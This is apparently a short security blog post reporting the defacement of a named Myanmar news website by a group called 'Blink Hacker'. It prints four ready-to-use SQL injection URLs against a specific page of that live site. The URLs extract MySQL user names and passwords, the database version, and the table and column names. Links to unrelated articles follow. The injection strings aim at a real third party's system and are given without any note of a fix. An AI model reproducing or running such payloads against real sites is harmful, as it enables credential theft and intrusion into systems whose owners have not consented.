A hacker group named themselves BLINK HACKER hacked http://www.khitlunge.net.mm and it’s a social and news site for Myanmar Latest News, Myanmar Breaking News, Myanmar Update News.

I don’t know how they attack and defaced but one of my team member reported and mailed me yesterday before Blink Hacker defaced it.

SQL Injection of Khitlunge.net.mm is as follow..

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28user,0x3a,password%29,4,5,6%20from%20mysql.user--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,4,5,6--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28table_name%29,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28column_name%29,4,5,6%20from%20information_schema.columns%20where%20table_schema=database%28%29--

Explore More

TCP/IP Tutorial

This tutorial is intended to supply a brief overview of TCP/IP protocol. Explanations of IP addresses, classes, netmasks, subnetting, and routing are provided, and several example networks are considered. The

Read More

What is “Clickjacking“? The latest Adobe Flash clipboard hijack attack

A new Web attacks is now in the wild. It’s named clickjacking – as discussed at the OWASP NYC AppSec 2008 Conference. Clickjacking is actually clipboard hijacking by adobe flash

Read More

Hackers return fire at security patches

Hackers have hit back against major security patches issued by the likes of Microsoft, with a marked rise in self-installing robot programs that allow an unauthorised user to control a

Read More